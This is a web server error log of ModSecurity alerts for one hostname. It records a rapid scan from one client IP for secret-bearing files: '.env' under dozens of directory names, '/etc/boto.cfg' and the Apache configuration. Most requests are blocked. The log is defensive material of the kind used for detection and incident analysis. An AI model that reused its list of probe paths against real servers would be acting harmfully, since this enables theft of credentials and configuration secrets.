[Mon May 11 20:55:52.728027 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/demo/.env"] [unique_id "agImONeaRXe5lR8y0ZOSugAAAUI"]
[Mon May 11 20:55:52.906943 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /erp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/erp/.env"] [unique_id "agImOCMeXtzav-mi9SyxZgAAAM8"]
[Mon May 11 20:55:52.907116 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/erp/.env"] [unique_id "agImOCMeXtzav-mi9SyxZgAAAM8"]
[Mon May 11 20:55:52.907336 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/erp/.env"] [unique_id "agImOCMeXtzav-mi9SyxZgAAAM8"]
[Mon May 11 20:55:52.989528 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/etc/boto.cfg"] [unique_id "agImOJYn-x0CHsbEbP2tagAAAIQ"]
[Mon May 11 20:55:52.989796 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/etc/boto.cfg"] [unique_id "agImOJYn-x0CHsbEbP2tagAAAIQ"]
[Mon May 11 20:55:52.989985 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/etc/boto.cfg"] [unique_id "agImOJYn-x0CHsbEbP2tagAAAIQ"]
[Mon May 11 20:55:52.991230 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /fe/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/fe/.env"] [unique_id "agImODP5Q_-MBliRCAxnGgAAABI"]
[Mon May 11 20:55:52.991382 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/fe/.env"] [unique_id "agImODP5Q_-MBliRCAxnGgAAABI"]
[Mon May 11 20:55:52.991568 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/fe/.env"] [unique_id "agImODP5Q_-MBliRCAxnGgAAABI"]
[Mon May 11 20:55:53.127733 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/etc/apache2/apache2.conf"] [unique_id "agImOVNddpkriGUb6ZV2kAAAAQw"]
[Mon May 11 20:55:53.127989 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/etc/apache2/apache2.conf"] [unique_id "agImOVNddpkriGUb6ZV2kAAAAQw"]
[Mon May 11 20:55:53.128193 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/etc/apache2/apache2.conf"] [unique_id "agImOVNddpkriGUb6ZV2kAAAAQw"]
[Mon May 11 20:55:53.199822 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /front/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/front/.env"] [unique_id "agImOfjVc-A-CSptvm1xOwAAAEg"]
[Mon May 11 20:55:53.199989 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/front/.env"] [unique_id "agImOfjVc-A-CSptvm1xOwAAAEg"]
[Mon May 11 20:55:53.200189 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/front/.env"] [unique_id "agImOfjVc-A-CSptvm1xOwAAAEg"]
[Mon May 11 20:55:53.206845 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/frontend/.env"] [unique_id "agImOfjVc-A-CSptvm1xPAAAAEs"]
[Mon May 11 20:55:53.207018 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/frontend/.env"] [unique_id "agImOfjVc-A-CSptvm1xPAAAAEs"]
[Mon May 11 20:55:53.207242 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/frontend/.env"] [unique_id "agImOfjVc-A-CSptvm1xPAAAAEs"]
[Mon May 11 20:55:53.226737 2026] [proxy_fcgi:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] AH01071: Got error 'Primary script unknown'
[Mon May 11 20:55:53.302541 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/laravel/.env"] [unique_id "agImOTP5Q_-MBliRCAxnHwAAABI"]
[Mon May 11 20:55:53.302709 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/laravel/.env"] [unique_id "agImOTP5Q_-MBliRCAxnHwAAABI"]
[Mon May 11 20:55:53.302890 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/laravel/.env"] [unique_id "agImOTP5Q_-MBliRCAxnHwAAABI"]
[Mon May 11 20:55:53.304332 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lms/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/lms/.env"] [unique_id "agImOZYn-x0CHsbEbP2tbwAAAI8"]
[Mon May 11 20:55:53.304521 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/lms/.env"] [unique_id "agImOZYn-x0CHsbEbP2tbwAAAI8"]
[Mon May 11 20:55:53.304726 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/lms/.env"] [unique_id "agImOZYn-x0CHsbEbP2tbwAAAI8"]
[Mon May 11 20:55:53.318025 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agImOSMeXtzav-mi9SyxbQAAAM4"]
[Mon May 11 20:55:53.318195 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agImOSMeXtzav-mi9SyxbQAAAM4"]
[Mon May 11 20:55:53.318373 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agImOSMeXtzav-mi9SyxbQAAAM4"]
[Mon May 11 20:55:53.335677 2026] [proxy_fcgi:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] AH01071: Got error 'Primary script unknown'
[Mon May 11 20:55:53.354376 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /market/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/market/.env"] [unique_id "agImOVNddpkriGUb6ZV2kwAAAQw"]
[Mon May 11 20:55:53.354523 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/market/.env"] [unique_id "agImOVNddpkriGUb6ZV2kwAAAQw"]
[Mon May 11 20:55:53.354717 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/market/.env"] [unique_id "agImOVNddpkriGUb6ZV2kwAAAQw"]
[Mon May 11 20:55:53.361474 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /marketing/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/marketing/.env"] [unique_id "agImOfjVc-A-CSptvm1xPgAAAEg"]
[Mon May 11 20:55:53.361635 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/marketing/.env"] [unique_id "agImOfjVc-A-CSptvm1xPgAAAEg"]
[Mon May 11 20:55:53.361822 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/marketing/.env"] [unique_id "agImOfjVc-A-CSptvm1xPgAAAEg"]
[Mon May 11 20:55:53.393179 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /media/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/media/.env"] [unique_id "agImOVNddpkriGUb6ZV2lQAAARE"]
[Mon May 11 20:55:53.393337 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/media/.env"] [unique_id "agImOVNddpkriGUb6ZV2lQAAARE"]
[Mon May 11 20:55:53.393525 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/media/.env"] [unique_id "agImOVNddpkriGUb6ZV2lQAAARE"]
[Mon May 11 20:55:53.398277 2026] [proxy_fcgi:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] AH01071: Got error 'Primary script unknown'
[Mon May 11 20:55:53.419379 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/new/.env"] [unique_id "agImOfjVc-A-CSptvm1xQgAAAEs"]
